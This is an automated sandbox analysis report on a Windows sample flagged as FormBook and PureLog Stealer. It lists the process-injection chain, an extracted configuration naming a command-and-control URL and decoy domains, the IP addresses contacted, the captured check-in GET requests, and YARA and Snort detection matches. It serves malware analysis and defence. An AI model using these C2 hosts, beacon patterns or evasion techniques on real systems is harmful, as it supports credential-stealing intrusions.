Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hOe2JrpIAE.exe

Overview

General Information

Sample name:hOe2JrpIAE.exe
renamed because original name is a hash value
Original sample name:f3b25ff7dc9cfcab029413dbaab77efdb5017d72ff5c0cc4d88769de1def78a6.exe
Analysis ID:1466892
MD5:21a8497522de5b8b12067fca910e0469
SHA1:314794ef8b3b0fc2f1efc2a68e04caa0e371ff25
SHA256:f3b25ff7dc9cfcab029413dbaab77efdb5017d72ff5c0cc4d88769de1def78a6
Tags:exe
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • hOe2JrpIAE.exe (PID: 4952 cmdline: "C:\Users\user\Desktop\hOe2JrpIAE.exe" MD5: 21A8497522DE5B8B12067FCA910E0469)
    • hOe2JrpIAE.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\hOe2JrpIAE.exe" MD5: 21A8497522DE5B8B12067FCA910E0469)
    • hOe2JrpIAE.exe (PID: 3524 cmdline: "C:\Users\user\Desktop\hOe2JrpIAE.exe" MD5: 21A8497522DE5B8B12067FCA910E0469)
    • hOe2JrpIAE.exe (PID: 1996 cmdline: "C:\Users\user\Desktop\hOe2JrpIAE.exe" MD5: 21A8497522DE5B8B12067FCA910E0469)
    • hOe2JrpIAE.exe (PID: 2796 cmdline: "C:\Users\user\Desktop\hOe2JrpIAE.exe" MD5: 21A8497522DE5B8B12067FCA910E0469)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • netsh.exe (PID: 5712 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • cmd.exe (PID: 3580 cmdline: /c del "C:\Users\user\Desktop\hOe2JrpIAE.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.tires-book-robust.bond/cn26/"], "decoy": ["ajtsistemas.com", "kolotylo.info", "mraofficial.store", "shopcupsareus.com", "odishastatenews.in", "yipicircle.life", "bryve.shop", "tempotrekstore.com", "casinoslotsjoint.com", "xiaoshuoxyz.com", "art-birdsflyinghigh.com", "odvip438.com", "verlatservicios.com", "bilocoin.world", "lamaisonfacile.com", "guojiang-v37.xyz", "shsredgpoufnds.net", "thequorumcompany.com", "qf4h1tcpmgxor7b.skin", "daisyjoanniezu.cyou", "r41opxw1076r.shop", "scientificmetalscorp.co", "shopusuniform.com", "j0mui3.shop", "halqiuststone.com", "hasenkamp.dev", "549965.autos", "nadarrawellness.com", "31artspace.com", "americanidolizing.com", "vacaychateau.com", "c377b2xq.shop", "essere.love", "e2olyiab.shop", "skechersshoes-cz.com", "laurabodyboost.com", "laser-skin-treatment-19799.bond", "theburnscleanteam.com", "tiensbangladesh.net", "sothana.top", "hillingpowerhouse.com", "kingelecpos.com", "xn--y3rqw57i.com", "foton.africa", "emergencyresponsemd.com", "0pjke0.vip", "keepitkoming.shop", "lamyahkalimi.com", "dehamobilya.com", "pornerbros.top", "happyjumps.co", "pool-repair-35063.bond", "thepassionpact.shop", "elroi-mexico.com", "xztyvk.xyz", "origenworld.com", "licstarmfprabakar.com", "asfaua.com", "zenvip.club", "seo-andorra.com", "cgffwelcome.com", "sswpdx.com", "7jtsyx.pw", "australiangamesgroup.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.hOe2JrpIAE.exe.3f99970.7.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        0.2.hOe2JrpIAE.exe.7140000.12.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          0.2.hOe2JrpIAE.exe.5b50000.10.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.hOe2JrpIAE.exe.3f99970.7.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.hOe2JrpIAE.exe.5b50000.10.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 16 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:07/03/24-14:51:07.057746
                SID:2031412
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/03/24-14:53:09.934739
                SID:2031412
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/03/24-14:53:30.424657
                SID:2031412
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/03/24-14:53:50.846445
                SID:2031412
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/03/24-14:52:08.288538
                SID:2031412
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/03/24-14:51:27.802913
                SID:2031412
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/03/24-14:52:28.804978
                SID:2031412
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/03/24-14:50:47.686112
                SID:2031412
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: hOe2JrpIAE.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://www.tires-book-robust.bond/cn26/www.foton.africaAvira URL Cloud: Label: malware
                Source: http://www.tires-book-robust.bond/cn26/Avira URL Cloud: Label: malware
                Source: www.tires-book-robust.bond/cn26/Avira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.tires-book-robust.bond/cn26/"], "decoy": ["ajtsistemas.com", "kolotylo.info", "mraofficial.store", "shopcupsareus.com", "odishastatenews.in", "yipicircle.life", "bryve.shop", "tempotrekstore.com", "casinoslotsjoint.com", "xiaoshuoxyz.com", "art-birdsflyinghigh.com", "odvip438.com", "verlatservicios.com", "bilocoin.world", "lamaisonfacile.com", "guojiang-v37.xyz", "shsredgpoufnds.net", "thequorumcompany.com", "qf4h1tcpmgxor7b.skin", "daisyjoanniezu.cyou", "r41opxw1076r.shop", "scientificmetalscorp.co", "shopusuniform.com", "j0mui3.shop", "halqiuststone.com", "hasenkamp.dev", "549965.autos", "nadarrawellness.com", "31artspace.com", "americanidolizing.com", "vacaychateau.com", "c377b2xq.shop", "essere.love", "e2olyiab.shop", "skechersshoes-cz.com", "laurabodyboost.com", "laser-skin-treatment-19799.bond", "theburnscleanteam.com", "tiensbangladesh.net", "sothana.top", "hillingpowerhouse.com", "kingelecpos.com", "xn--y3rqw57i.com", "foton.africa", "emergencyresponsemd.com", "0pjke0.vip", "keepitkoming.shop", "lamyahkalimi.com", "dehamobilya.com", "pornerbros.top", "happyjumps.co", "pool-repair-35063.bond", "thepassionpact.shop", "elroi-mexico.com", "xztyvk.xyz", "origenworld.com", "licstarmfprabakar.com", "asfaua.com", "zenvip.club", "seo-andorra.com", "cgffwelcome.com", "sswpdx.com", "7jtsyx.pw", "australiangamesgroup.com"]}
                Multi AV Scanner detection for submitted file
                Source: hOe2JrpIAE.exeReversingLabs: Detection: 68%
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: hOe2JrpIAE.exeJoe Sandbox ML: detected
                Source: hOe2JrpIAE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: hOe2JrpIAE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: XUhH.pdb source: hOe2JrpIAE.exe
                Source: Binary string: XUhH.pdbSHA256 source: hOe2JrpIAE.exe
                Source: Binary string: netsh.pdb source: hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2052100186.0000000001460000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000002.4441556154.0000000001080000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: netsh.pdbGCTL source: hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2052100186.0000000001460000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.4441556154.0000000001080000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: hOe2JrpIAE.exe, 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.2052359711.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.2050482991.000000000393F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: hOe2JrpIAE.exe, hOe2JrpIAE.exe, 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000003.2052359711.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.2050482991.000000000393F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 4x nop then pop edi6_2_00417D7F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 4x nop then pop edi6_2_00417DCA
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi8_2_030C7D7F
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi8_2_030C7DCA

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 162.244.93.3:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 199.59.243.226:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49721 -> 14.128.41.165:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49722 -> 34.149.87.45:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49723 -> 3.33.130.190:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49724 -> 52.60.87.163:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 34.92.194.225:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 3.33.130.190:80
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.226 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 162.244.93.3 80Jump to behavior
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: www.tires-book-robust.bond/cn26/
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=CmFgnMATfu/lD1Rd1GHYmtbpicIpwpy90rRc4LoWjy4DICrpuFEBTKor21hYt8nWF2kM&Kr=YtxTb HTTP/1.1Host: www.tiensbangladesh.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=Wwa2UMOYo9JcJMQ5ME0Q+bO7/4aNL8yaSIJN/NKFPRQQ6eA3A90uIzxodQffq+AadB6M&Kr=YtxTb HTTP/1.1Host: www.shopusuniform.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=xh0AWH03uTuLb7lNYJWhmJpAztdjm7ZCIfIRc9jnByUCUf27hW5Mghto8D6CFT3eDifI&Kr=YtxTb HTTP/1.1Host: www.j0mui3.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=vyOlf6d0gdkMF27YEBTjWR4sd91tQ6met0nuZUZfy4zFrLxX9BwP111ngtT6h4ZwTfCv&Kr=YtxTb HTTP/1.1Host: www.dehamobilya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=pbSbn1rMiq1OPTP6ICdnvfWphahg9+3Gt5uoQw76hA6d6T1GJ+eKg+Q7XOnjWxnlol53&Kr=YtxTb HTTP/1.1Host: www.happyjumps.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=hM6dqt0bNRJ3wnqohXEckG+ra7BpyCFNN1yCjjYC1YEFAohibEIyfRXhhB3fmL/JtGSj&Kr=YtxTb HTTP/1.1Host: www.yipicircle.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: Joe Sandbox ViewIP Address: 199.59.243.226 199.59.243.226
                Source: Joe Sandbox ViewIP Address: 34.149.87.45 34.149.87.45
                Source: Joe Sandbox ViewIP Address: 34.149.87.45 34.149.87.45
                Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
                Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
                Source: Joe Sandbox ViewASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
                Source: Joe Sandbox ViewASN Name: PONYNETUS PONYNETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4DAF82 getaddrinfo,setsockopt,recv,7_2_0E4DAF82
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=CmFgnMATfu/lD1Rd1GHYmtbpicIpwpy90rRc4LoWjy4DICrpuFEBTKor21hYt8nWF2kM&Kr=YtxTb HTTP/1.1Host: www.tiensbangladesh.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=Wwa2UMOYo9JcJMQ5ME0Q+bO7/4aNL8yaSIJN/NKFPRQQ6eA3A90uIzxodQffq+AadB6M&Kr=YtxTb HTTP/1.1Host: www.shopusuniform.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=xh0AWH03uTuLb7lNYJWhmJpAztdjm7ZCIfIRc9jnByUCUf27hW5Mghto8D6CFT3eDifI&Kr=YtxTb HTTP/1.1Host: www.j0mui3.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=vyOlf6d0gdkMF27YEBTjWR4sd91tQ6met0nuZUZfy4zFrLxX9BwP111ngtT6h4ZwTfCv&Kr=YtxTb HTTP/1.1Host: www.dehamobilya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=pbSbn1rMiq1OPTP6ICdnvfWphahg9+3Gt5uoQw76hA6d6T1GJ+eKg+Q7XOnjWxnlol53&Kr=YtxTb HTTP/1.1Host: www.happyjumps.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=hM6dqt0bNRJ3wnqohXEckG+ra7BpyCFNN1yCjjYC1YEFAohibEIyfRXhhB3fmL/JtGSj&Kr=YtxTb HTTP/1.1Host: www.yipicircle.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficDNS traffic detected: DNS query: www.theburnscleanteam.com
                Source: global trafficDNS traffic detected: DNS query: www.tiensbangladesh.net
                Source: global trafficDNS traffic detected: DNS query: www.shopusuniform.com
                Source: global trafficDNS traffic detected: DNS query: www.j0mui3.shop
                Source: global trafficDNS traffic detected: DNS query: www.cgffwelcome.com
                Source: global trafficDNS traffic detected: DNS query: www.dehamobilya.com
                Source: global trafficDNS traffic detected: DNS query: www.happyjumps.co
                Source: global trafficDNS traffic detected: DNS query: www.tires-book-robust.bond
                Source: global trafficDNS traffic detected: DNS query: www.foton.africa
                Source: global trafficDNS traffic detected: DNS query: www.e2olyiab.shop
                Source: global trafficDNS traffic detected: DNS query: www.yipicircle.life
                Source: global trafficDNS traffic detected: DNS query: www.tempotrekstore.com
                Source: explorer.exe, 00000007.00000002.4446934807.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4446934807.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: hOe2JrpIAE.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: hOe2JrpIAE.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: explorer.exe, 00000007.00000000.2007072938.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4441584000.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                Source: explorer.exe, 00000007.00000002.4446934807.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4446934807.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: explorer.exe, 00000007.00000002.4446934807.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4446934807.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: hOe2JrpIAE.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: explorer.exe, 00000007.00000002.4446934807.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4446934807.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 00000007.00000002.4446934807.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: explorer.exe, 00000007.00000000.2010237532.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4446456942.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2009741979.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: hOe2JrpIAE.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ajtsistemas.com
                Source: explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ajtsistemas.com/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ajtsistemas.comReferer:
                Source: explorer.exe, 00000007.00000003.3777555916.000000000C8EB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.
                Source: explorer.exe, 00000007.00000000.2013207443.000000000C8DD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.A
                Source: explorer.exe, 00000007.00000003.3098535056.000000000C8DD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096521466.000000000C8DD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.B
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cgffwelcome.com
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cgffwelcome.com/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cgffwelcome.com/cn26/www.dehamobilya.com
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cgffwelcome.comReferer:
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dehamobilya.com
